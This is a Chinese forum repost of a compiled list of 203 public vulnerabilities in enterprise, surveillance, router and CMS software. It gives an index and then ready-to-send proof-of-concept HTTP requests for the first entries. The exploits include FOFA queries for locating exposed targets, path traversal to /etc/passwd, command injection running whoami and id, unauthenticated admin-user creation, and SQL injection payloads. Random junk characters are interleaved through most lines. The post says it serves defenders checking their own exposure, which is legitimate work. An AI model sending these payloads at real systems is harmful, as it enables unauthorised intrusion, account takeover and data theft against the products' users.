中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406- e# B8 [* P( h" h
道一安全 2024-06-05 07:41 北京
8 x0 ^) x; F0 e2 s. X& L% r以下文章来源于网络安全新视界 ,作者网络安全新视界
9 t) n2 }* n+ F) i5 v  F
8 r5 p) L% F$ n1 r发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
2 h( A: k5 v% p7 K" O5 L/ j. X! p7 N& b( ]
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。1 |7 }# F# x2 L' I

' m  d( q' ^. ?* j3 h0 R0 k  b5 n安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。* L! ^) z1 `0 _, V9 ]. p% M) ^  Z
7 Z" z$ A* w9 U9 ]! Z' ]& ]( p
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
. ]7 j. l4 f! s( N5 Q
) y, v  U& b9 y0 D, j5 R  \+ V合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。! U1 f4 F& L1 J7 V1 Z

& x3 U  @7 d4 I- [
  j$ z9 g  ~, ?) D! L7 U声明
0 G2 \* [+ X9 g. D% w: Z8 y
- ]( X4 s. z9 J8 T为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。7 Z' w/ h- k* d( u' g6 V2 r8 h
/ \6 I% F- ^. n/ f+ i+ ?7 h
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
: E8 C) \" C' ^
8 R( m# b- t$ \2 X
2 z2 v  u* t* }
9 q9 n# l' }& ^) l( T% i目录- F8 H' ^/ x7 h- w5 p, i) A. z; C

  ~  x- I1 Q" q- h8 X014 p) m8 W  B, d" U. G8 U2 V

# H0 X. m0 j) _) e8 Y1. StarRocks MPP数据库未授权访问
  {8 y0 X$ a7 t% K+ o2. Casdoor系统static任意文件读取5 W7 n% f6 h2 `' p4 r8 A
3. EasyCVR智能边缘网关 userlist 信息泄漏* ^* a3 W  L5 R$ b! @
4. EasyCVR视频管理平台存在任意用户添加% w& T8 E- c5 ]+ ^& g9 r
5. NUUO NVR 视频存储管理设备远程命令执行2 i; K. i0 o+ h9 Q: `) P
6. 深信服 NGAF 任意文件读取
: V1 C0 z1 ]& Q5 d  Y7. 鸿运主动安全监控云平台任意文件下载
5 ?- C$ z3 ]7 j8. 斐讯 Phicomm 路由器RCE$ E, X: i* T% d# K. \* j
9. 稻壳CMS keyword 未授权SQL注入6 p6 {4 C- ~; X% G
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" D; {6 |+ N4 P- \! _+ E) O11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% D" |$ s8 p& L& T5 J) h- z
12. Jorani < 1.0.2 远程命令执行, K2 D( r8 c) N1 O3 z- M1 G9 t6 Z) Y
13. 红帆iOffice ioFileDown任意文件读取1 o( J# E4 r( b) U* F. w' Q) C
14. 华夏ERP(jshERP)敏感信息泄露
) Y5 d: j0 O% R$ s15. 华夏ERP getAllList信息泄露/ M8 f: I3 N3 S( Z) T) ^% c
16. 红帆HFOffice医微云SQL注入
  x# q# y0 h% Z; R2 R; j17. 大华 DSS itcBulletin SQL 注入& h4 D3 y& w% c' E" X5 x  Z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
4 R  q. q5 M/ k* Y19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入" b8 Z& i5 p9 G) \& V
20. 大华ICC智能物联综合管理平台任意文件读取% |4 q6 t3 W& U1 V+ P6 M
21. 大华ICC智能物联综合管理平台random远程代码执行
6 |1 l, J; I" k; ~; U22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 E) ~9 r. V: c4 Y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
7 U& @* Z* Q2 H7 r$ E# b24. 用友NC 6.5 accept.jsp任意文件上传
: U* S3 M! Z# z0 j25. 用友NC registerServlet JNDI 远程代码执行! F+ J3 P: d: j
26. 用友NC linkVoucher SQL注入7 g9 A& R2 p( _; D
27. 用友 NC showcontent SQL注入% @! I$ V* \0 v9 e0 h- v
28. 用友NC grouptemplet 任意文件上传) R2 ?1 D- r: r6 ~+ N' M& }
29. 用友NC down/bill SQL注入: ?; B0 f3 A$ R. `
30. 用友NC importPml SQL注入7 w) G' b( |8 _
31. 用友NC runStateServlet SQL注入
. ~0 l8 _: e* M( d8 K32. 用友NC complainbilldetail SQL注入
2 ?  c& b9 Y) c* l7 A33. 用友NC downTax/download SQL注入. X+ R  O/ U; {$ h
34. 用友NC warningDetailInfo接口SQL注入
; b7 T+ a+ G( D5 u) Z5 @0 Q0 j35. 用友NC-Cloud importhttpscer任意文件上传
- D! q8 ^9 s. Q36. 用友NC-Cloud soapFormat XXE
) o" b9 u% ~$ ?# t+ H9 \37. 用友NC-Cloud IUpdateService XXE( z& {/ w) y( K
38. 用友U8 Cloud smartweb2.RPC.d XXE
! G2 i& Y  p$ c/ ]3 e39. 用友U8 Cloud RegisterServlet SQL注入
" I6 c% W' ]6 o! ~40. 用友U8-Cloud XChangeServlet XXE
: P4 ^9 ?8 W2 z6 B0 i7 e41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 p) N; x+ _$ ^; Y  s2 Z42. 用友GRP-U8 SmartUpload01 文件上传
- Z; N) N: X2 {! r& P43. 用友GRP-U8 userInfoWeb SQL注入致RCE- C  w6 |* {' v9 z3 P
44. 用友GRP-U8 bx_dj_check.jsp SQL注入! d) p% m) p3 ?5 ~
45. 用友GRP-U8 ufgovbank XXE
. P8 U# E% J" M# P. }4 j; A46. 用友GRP-U8 sqcxIndex.jsp SQL注入# a# l; s5 A6 z' o8 w
47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 v) V+ m5 V; {  |6 I) A  l4 @48. 用友U8 CRM swfupload 任意文件上传
' Q# {, H2 x9 W49. 用友U8 CRM系统uploadfile.php接口任意文件上传, P  D, T. l) z. r9 P: n5 e: ~
50. QDocs Smart School 6.4.1 filterRecords SQL注入
9 f& Y0 w( L) W4 u) t4 g( _51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入# m3 S# b) g1 w
52. 泛微E-Office json_common.php sql注入
4 H* ~2 m5 K+ g! |53. 迪普 DPTech VPN Service 任意文件上传7 R% L, J8 k" N5 |8 @, R4 b5 Y
54. 畅捷通T+ getstorewarehousebystore 远程代码执行& Z! k  ?6 t8 f  N4 k, m8 ~% q2 [
55. 畅捷通T+ getdecallusers信息泄露
. \; P' t) `: m; o56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE7 w& Y! A. R! U/ _' R
57. 畅捷通T+ keyEdit.aspx SQL注入* Q/ {8 }- ^5 {4 ]9 Y) W
58. 畅捷通T+ KeyInfoList.aspx sql注入
! ]9 I6 C# e* R59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
: x  x  i- q* B7 H" O60. 百卓Smart管理平台 importexport.php SQL注入
3 j0 c, S, e, C$ T! a61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
, t0 D7 h7 u& a/ ~- B# S! k62. IP-guard WebServer 远程命令执行' q9 x- H) P2 ?( R2 K& j
63. IP-guard WebServer任意文件读取
1 f6 r' `. X; x0 |. I5 G64. 捷诚管理信息系统CWSFinanceCommon SQL注入
" ^$ a. [) J8 n) D' v+ g, {65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过; Q3 V% f: A% x
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 A0 ^! M. J$ y8 T/ j2 s6 ~
67. 万户ezOFFICE wpsservlet任意文件上传
& z0 q+ q7 p- g6 X  M' z6 M9 Z68. 万户ezOFFICE wf_printnum.jsp SQL注入2 k4 B  Z; T1 \& Q! Q9 j( s3 F
69. 万户 ezOFFICE contract_gd.jsp SQL注入; n5 C/ B1 y/ j" _
70. 万户ezEIP success 命令执行
5 _0 Q7 b* L+ M$ n4 R5 d71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入' B1 E+ ?0 ^7 x* C
72. 致远OA getAjaxDataServlet XXE
; C' J! P+ \$ e7 [( F3 M73. GeoServer wms远程代码执行5 @4 N: d2 n- y1 g# L% i3 r! h
74. 致远M3-server 6_1sp1 反序列化RCE" e7 M" P6 G- ^: _! R3 ~% B
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 H2 s9 n- T4 Q: C# s2 w
76. 新开普掌上校园服务管理平台service.action远程命令执行
6 N# H% p: E: l  N& A+ T/ n8 N77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ y* O) c' N: T/ x78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传# w4 P/ u7 X, }+ v( v! w0 C  v9 L
79. BYTEVALUE 百为流控路由器远程命令执行
* J- X2 e$ z8 h' L) \3 E80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 |* s" m: b( a8 j% e
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: q/ z- L( D) U, k/ l% E+ R82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' {8 B6 x/ {- A4 k1 N
83. JeecgBoot testConnection 远程命令执行$ t% Z/ D$ O  ]( {9 K% u
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' U( t9 z) c. f, I) t  X85. SysAid On-premise< 23.3.36远程代码执行
. A: O7 Z9 _4 B' Z4 Z! F  [" `0 Y7 W3 W86. 日本tosei自助洗衣机RCE. `/ U2 _# d! u: t" c; H
87. 安恒明御安全网关aaa_local_web_preview文件上传
4 Q7 W3 N7 ^1 V3 |88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
" J7 @! v) _& X2 Z+ a' M89. 致远互联FE协作办公平台editflow_manager存在sql注入
. M& t9 d# x" [1 r7 ~90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行2 H& Z: {( Q3 a8 m- t" \2 T
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取* ?" m( `- L; P- v- B+ b+ ~0 X
92. 海康威视运行管理中心session命令执行0 p& D6 U/ H  R+ n# K' U( [
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 k) v8 e% y) r/ O) s94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
' R5 O' }0 D; T0 m95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行  O" d4 T1 e- Y+ G: ]( s! |
96. Apache OFBiz  18.12.11 groovy 远程代码执行" N" V* Y3 R) `  g" p. W5 H6 e1 U/ O
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行' G- {) c( B1 E( B( Y
98. SpiderFlow爬虫平台远程命令执行' C  j3 E, W" v" x
99. Ncast盈可视高清智能录播系统busiFacade RCE
6 b4 K& c4 j9 @. e9 q; A100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
. U: H% B+ H) L- I/ H$ J101. ivanti policy secure-22.6命令注入# D! J9 X8 w! c" M6 d& m
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
; e0 ]; O  G, C0 N7 c# Z103. Ivanti Pulse Connect Secure VPN XXE! A9 j7 Y3 P  E' X( q$ k# Y7 J
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
2 n7 c4 q6 o! ^! L" g/ P1 G105. SpringBlade v3.2.0 export-user SQL 注入
+ o2 M- E3 X" v$ o; q106. SpringBlade dict-biz/list SQL 注入
2 k1 N4 |( W% d6 l, I+ Q107. SpringBlade tenant/list SQL 注入- Q, E2 }2 T( w5 [" A8 H! {
108. D-Tale 3.9.0 SSRF
1 Q+ Y2 @2 ^& V; g7 N5 y9 x109. Jenkins CLI 任意文件读取
$ _5 U: R4 j9 J+ B7 g: d110. Goanywhere MFT 未授权创建管理员
- K" u( E6 Z5 [9 p111. WordPress Plugin HTML5 Video Player SQL注入
& }. U: [' g( o9 k  _5 W112. WordPress Plugin NotificationX SQL 注入
/ }3 j+ r: A/ k4 a% H5 |113. WordPress Automatic 插件任意文件下载和SSRF
2 Z- R. j  K2 x- V  t' ?0 D114. WordPress MasterStudy LMS插件 SQL注入
" `0 S$ z+ d" G3 i% j) z115. WordPress Bricks Builder <= 1.9.6 RCE$ h/ d3 R8 a* Z  Q4 O0 r0 C
116. wordpress js-support-ticket文件上传
5 M# k) y( Z; O& Y# e( B7 o' D117. WordPress LayerSlider插件SQL注入# A' J* m( q' q% M$ i+ k  N# k
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
5 a: P  I, _% K$ u+ A9 Y6 j8 z! c119. 北京百绰智能S20后台sysmanageajax.php sql注入
& p6 b+ R) W+ p, t. t# r0 E; V120. 北京百绰智能S40管理平台导入web.php任意文件上传
  O- f+ T- N1 h3 T/ m& h121. 北京百绰智能S42管理平台userattestation.php任意文件上传
  s! z! V) s, N122. 北京百绰智能s200管理平台/importexport.php sql注入) j/ B* \, y% F9 L. b
123. Atlassian Confluence 模板注入代码执行
9 L, V8 V0 Y) Z- B124. 湖南建研工程质量检测系统任意文件上传7 I; l: ~* _9 q9 f* \
125. ConnectWise ScreenConnect身份验证绕过
) U% Q) |* H! i( R: X126. Aiohttp 路径遍历+ B/ [, `+ ?7 k% N& J+ P0 b
127. 广联达Linkworks DataExchange.ashx XXE% J6 [9 N! D& U5 w$ {6 ?
128. Adobe ColdFusion 反序列化; ~  I* l4 q" S6 g
129. Adobe ColdFusion 任意文件读取
# S1 E: k" G- W( z130. Laykefu客服系统任意文件上传9 P# j# h3 J9 I& o( l6 w2 p
131. Mini-Tmall <=20231017 SQL注入
# X/ I% m# f. F3 l( S3 D$ R132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
; `& ~" o$ Z4 k3 O& ], s133. H5 云商城 file.php 文件上传
6 ^0 p% f* ~. u, T134. 网康NS-ASG应用安全网关index.php sql注入
; N) Z5 E# x2 c( [* `: g; S135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入4 `% `  C  s" p1 Q
136. NextChat cors SSRF
6 _1 q% @& |9 ~* }* e137. 福建科立迅通信指挥调度平台down_file.php sql注入
: `0 ?0 n1 S, H+ \( v138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 L4 n, x! x3 J0 |
139. 福建科立讯通信指挥调度平台editemedia.php sql注入  B6 c  A2 W6 @: `4 L" M; x
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
! q7 g" @+ c0 w141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入3 b$ B" Z/ K" q( D9 W
142. CMSV6车辆监控平台系统中存在弱密码# j% h3 k5 P+ }6 ^8 c9 i
143. Netis WF2780 v2.1.40144 远程命令执行
4 h% X; S, `/ R' `1 s144. D-Link nas_sharing.cgi 命令注入1 h8 i1 e3 H+ d( n
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; E7 G5 x+ X  k  `5 c( f0 G) O' g
146. MajorDoMo thumb.php 未授权远程代码执行$ ]% H! E4 f; C. O7 p' S' d% U
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: _7 D+ v' n. h8 C- ~
148. CrushFTP 认证绕过模板注入5 T2 p0 ?  l1 h9 m/ a" u# }6 c4 V. ^
149. AJ-Report开源数据大屏存在远程命令执行
# F, O; Q) S0 c2 R! D150. AJ-Report 1.4.0 认证绕过与远程代码执行' E' Z! |; x! w& A
151. AJ-Report 1.4.1 pageList sql注入
& u. O# }3 i2 o" q. j/ G152. Progress Kemp LoadMaster 远程命令执行3 J# ^# A; T. }0 Q
153. gradio任意文件读取
- M6 Y7 K; j2 `  d( ?. s8 ?154. 天维尔消防救援作战调度平台 SQL注入, X) }6 F/ r6 G+ e
155. 六零导航页 file.php 任意文件上传
8 O6 j# ~" c) W. k; i156. TBK DVR-4104/DVR-4216 操作系统命令注入
' Q. [4 t6 }& t1 b" D+ f3 y157. 美特CRM upload.jsp 任意文件上传
* z* }) e' M' I2 H0 ~  [158. Mura-CMS-processAsyncObject存在SQL注入
$ t6 \$ s$ |( I- [: I* H; n# B1 h159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
) U, b& r3 z& b; b: h160. Sonatype Nexus Repository 3目录遍历与文件读取, U6 K, O' ^" p1 @2 X# p
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传! V5 t9 U4 t9 @: y+ y0 k
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 N- b; b& l8 P6 ^1 t4 W
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ G1 T. W  [- d3 \) Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传9 H, b: D4 E0 S: d
165. OrangeHRM 3.3.3 SQL 注入) ]( X' ?9 f" ^6 q9 F5 x5 c
166. 中成科信票务管理平台SeatMapHandler SQL注入
4 a$ G3 e; g# G. q' n. c167. 精益价值管理系统 DownLoad.aspx任意文件读取
- M; E6 U9 C$ c! e% f9 Z3 o168. 宏景EHR OutputCode 任意文件读取
! w2 p( J# J+ ?$ h- ]5 w169. 宏景EHR downlawbase SQL注入; A1 s7 w# o! i6 a' l
170. 宏景EHR DisplayExcelCustomReport 任意文件读取! ?5 ~9 l* y* [* {& }
171. 通天星CMSV6车载定位监控平台 SQL注入
  M% }" E0 D4 S" m. ]. P172. DT-高清车牌识别摄像机任意文件读取2 ~9 y4 a' H' y7 X! V
173. Check Point 安全网关任意文件读取
. ^2 S! N# I3 H' T174. 金和OA C6 FileDownLoad.aspx 任意文件读取" C' \4 W: g6 x# i/ Z
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入7 r& }2 {' i0 T- U/ Y
176. 电信网关配置管理系统 rewrite.php 文件上传
4 w' d( Q, ?1 X% p% P% O; i+ a177. H3C路由器敏感信息泄露1 C& C7 A3 l) r4 c0 u4 [0 U& P. I
178. H3C校园网自助服务系统-flexfileupload-任意文件上传# e+ g; K1 N+ A+ _, G! ?  e# V
179. 建文工程管理系统存在任意文件读取8 R) \" D0 E5 _
180. 帮管客 CRM jiliyu SQL注入
4 W, e+ R1 o; W181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入- f+ ]$ ~* [, J2 U0 w
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; Q: N6 @1 S4 k# z  E1 o, Y183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 p& S# a$ s" D% J2 o184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ L# Z+ |4 T8 \, O185. 瑞友天翼应用虚拟化系统SQL注入
; t( v& E  I3 R6 y/ T186. F-logic DataCube3 SQL注入7 K5 M( m) C! n( P
187. Mura CMS processAsyncObject SQL注入; d5 I- o! @8 a
188. 叁体-佳会视频会议 attachment 任意文件读取
$ ^1 ^0 ?$ h& }$ L% k4 V) E: `189. 蓝网科技临床浏览系统 deleteStudy SQL注入6 P. q4 H* g' ?+ a  z. t+ b( K5 w
190. 短视频矩阵营销系统 poihuoqu 任意文件读取: `, O5 a( b& Q0 r& q
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* v- P6 m# {7 U* w
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
' M3 R" G* E) y1 B* [% e193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行, G7 X9 m0 e, I* A
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
; l! {6 W9 ]. K2 Q4 j195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 Q* Z$ o6 Z% A5 t) Q4 S196. 河南省风速科技统一认证平台密码重置6 d& |  E3 j1 U& V/ `7 T
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* C! W4 z# j- k! D
198.  阿里云盘 WebDAV 命令注入( s) V  m  y, R& V3 N
199. cockpit系统assetsmanager_upload接口 文件上传
( A7 p: F" ?0 O# I" g# G) {  A200. SeaCMS海洋影视管理系统dmku SQL注入
% i! P- Z* U5 z6 z201. 方正全媒体新闻采编系统 binary SQL注入
2 Z$ T' S2 x' r' k2 l202. 微擎系统 AccountEdit任意文件上传! \$ R; @7 A: J6 f' E5 P
203. 红海云EHR PtFjk 文件上传
9 }! I3 ~) s1 A: m, h" j0 ]( E% n/ c3 P  |- J5 j* f
POC列表
3 a! O# d( e/ u, c& y  ~9 J9 e6 j. z2 k, I) Z
02
/ K$ |- I& L7 X0 N; G, ^; _5 |4 ~0 J* {% T; ^8 w  e
1. StarRocks MPP数据库未授权访问
  x+ k3 Q+ Q0 s5 g: Q0 AFOFA :title="StarRocks": W+ M" z* K1 \1 n9 C: T* P
GET /mem_tracker HTTP/1.1
9 k' _" x7 {, S$ oHost: URL
8 r& m+ p4 i7 @4 ?' M* E7 i& f
7 m8 ]) v; a- I" X- e! y: ^- J, S, P/ Q7 S$ n
2. Casdoor系统static任意文件读取) `3 m0 }9 v; O
FOFA :title="Casdoor"
! ^  O, x3 \+ Z0 q0 d) n: XGET /static/../../../../../../../../../../../etc/passwd HTTP/1.12 o' @, H5 _1 f: C5 N  S
Host: xx.xx.xx.xx:9999
: P7 A, N# P! v: [1 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 b7 I/ z$ X: ~5 B* M5 d# P
Connection: close
5 [# D8 a( \  U! y4 eAccept: */*1 S& w8 v+ d$ {" N
Accept-Language: en+ t- j+ ~& u, C  }8 j% J/ `
Accept-Encoding: gzip8 {' ?  Y2 {! I+ D$ W- z
2 v8 c, ^( `* ?3 X: H5 n5 a+ l$ m

. f7 E) u7 C% M/ m0 d3. EasyCVR智能边缘网关 userlist 信息泄漏
5 {* h% o/ W* y& g! NFOFA :title="EasyCVR"3 D9 r1 ]$ y8 N1 c5 C
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.15 U& }/ X- l, f) t- d
Host: xx.xx.xx.xx! |  \4 T! Y7 K: ^0 P8 f

" u2 [7 Q" i# t5 D& ?  }% t4 `% w, J: O/ y
4. EasyCVR视频管理平台存在任意用户添加
+ A. K4 b' \3 B5 B# I4 oFOFA :title="EasyCVR"
! z& |& ^1 j, P4 U0 A! F
) O& g& T7 K5 O6 A8 Lpassword更改为自己的密码md52 G9 p# `: ~% j
POST /api/v1/adduser HTTP/1.1
! t! J9 ]% T5 u. j" HHost: your-ip1 k+ K/ ?9 x! C* b$ J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
: Q2 X# @& m3 K3 b0 V; k2 B5 m+ J$ [9 |' l0 q
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
, A% ~4 o3 X3 @# _, h) F- S' m& P$ }9 x$ O3 C' s
, i! U3 f* \3 Z+ C, {2 [* E+ L. y
5. NUUO NVR 视频存储管理设备远程命令执行2 K7 S. v* \1 c6 `  H
FOFA:title="Network Video Recorder Login"3 X5 i' \4 E# V* q  Y
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
1 b" U8 d3 F' m. l  N( g: ?Host: xx.xx.xx.xx# n' V5 [$ ?' V5 D* N
5 f2 i. ]2 p; p9 Z% H5 |. j
/ \5 _: w  q# g4 g1 }) c/ h0 z
6. 深信服 NGAF 任意文件读取
5 o/ l+ f$ ^9 KFOFA:title="SANGFOR | NGAF"
# H) ^% v' A$ I# O$ ]GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.11 w: o8 f# d  v; E8 m: R
Host:% J% x2 N5 y" Z

4 r2 d# @* _4 j, U; o/ K1 E
( u. |" E9 N+ ]  t7. 鸿运主动安全监控云平台任意文件下载+ v5 H, \8 v  K' u0 }+ J! N
FOFA:body="./open/webApi.html"  {/ @/ r& A4 h9 G- D8 s
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
9 O) i% b  x7 p+ g; s8 n# ^Host:
4 W6 q4 z: J1 j( t/ |) O. H4 [
) y# D$ |$ R/ A& Y+ y# ^" n# ^4 Y& J; d7 f2 N
8. 斐讯 Phicomm 路由器RCE/ ?4 e# G8 g) J
FOFA:icon_hash="-1344736688"! i& r6 `/ R* ~1 U" n7 O
默认账号admin登录后台后,执行操作
* Q. y: n0 h; `  OPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
- p7 f" F5 S8 jHost: x.x.x.x
3 b0 F; S" Z, y/ v& h9 L  m2 ?9 F- W1 ZCookie: sysauth=第一步登录获取的cookie
/ I2 j* q& @* D# aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz7 L( g+ C' @! n5 l% F  n- B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ l( ^- p+ g' {

$ u2 F8 w, g' e% d4 Y) B------WebKitFormBoundaryxbgjoytz
' l3 F8 [% J7 PContent-Disposition: form-data; name="wifiRebootEnablestatus"# j; x. K; T5 X7 [' q- S5 d
6 O/ n1 Y- ?/ W' k) g! j7 }9 _
%s
  J3 x& n  w, A+ ]1 S5 |0 _------WebKitFormBoundaryxbgjoytz0 X- L" N! X1 }+ j* J# X0 \
Content-Disposition: form-data; name="wifiRebootrange"
7 |: J, b+ I5 I3 s: j% t, C- d9 W! _1 m. {+ [' `
12:00; id;
( w8 ~7 S/ M9 s, @8 z: v% d% I& n: A+ [------WebKitFormBoundaryxbgjoytz
. Y! t; w  R% uContent-Disposition: form-data; name="wifiRebootendrange"
  v" ]5 n  @2 n( s. E
- x5 _: S. U, U%s:
+ Z! F* A* G8 C) Y# ]+ v9 R------WebKitFormBoundaryxbgjoytz
# Q$ L! \* H( UContent-Disposition: form-data; name="cururl2"
/ j8 x# G4 ~! D& l7 U4 Q% j/ ?3 o4 m* H

2 z# g7 _  H3 H1 N------WebKitFormBoundaryxbgjoytz--4 \8 P/ i& u: X  y6 O
6 |" O6 X7 }0 T

" s) V* O4 s& Y$ W% v' ~9. 稻壳CMS keyword 未授权SQL注入* [& T! z2 O$ E1 M5 N9 K/ p
FOFA:app="Doccms"$ ]1 Z' R; }  I1 Y4 V8 ~
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
2 \  c0 E! a- S# kHost: x.x.x.x
2 x& i2 y6 G4 l% T
+ x6 \+ y  a6 L9 T' T! f5 X" e8 p' m1 J& \& c) s' l+ j! c
payload为下列语句的二次Url编码
* ~( [4 o( I6 ?( p
7 p9 t* g6 I' V# C' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#: V8 v, u# v0 Q' Q2 r6 E
+ N- W6 x, g1 o1 {. O8 D
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" x5 R! W# b/ R+ x
FOFA:icon_hash="953405444"
! U- W  n" x9 f! b) Y) c& J# u: G) P
文件上传后响应中包含上传文件的路径
+ j/ K9 p# F% r; [0 z( OPOST /eis/service/api.aspx?action=saveImg HTTP/1.1. k4 C$ H/ h! G- K
Host: x.x.x.x:xx
2 X: h4 t5 u; [' Q7 L, M7 {0 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* X' T2 z4 e  H) u4 y
Content-Length: 197
1 @; Z6 S" [" i. lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. u0 b) v$ ]9 }& V. x
Accept-Encoding: gzip, deflate4 P' K3 A& Y- U) h' B
Accept-Language: zh-CN,zh;q=0.9
  d$ o. m6 h5 f9 x; EConnection: close# g2 R  a: k5 {  p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu/ c9 }# `6 e# k3 t: ^* P6 X
6 p* ], ?6 m) o% }/ u
------WebKitFormBoundaryxdgaqmqu
, `& h5 o, C  ~; n1 n) HContent-Disposition: form-data; name="file"filename="icfitnya.txt"
( S; y$ u# L8 t" w& {; IContent-Type: text/html$ |% P" X6 O& e/ y8 u/ I, ?9 ?

3 o8 I4 h% o. G( i' sjmnqjfdsupxgfidopeixbgsxbf! K& y, y7 ?1 Z6 k* n8 I2 j6 _' i/ H
------WebKitFormBoundaryxdgaqmqu--
1 q" I& h! ~1 B5 B9 P
  I0 X" Y5 l. ~+ a# O- i7 k3 h# _; x' i
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
+ U( o1 b( m. `$ [9 u' @+ YFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"+ r6 y5 |) L1 ^8 i! V7 \
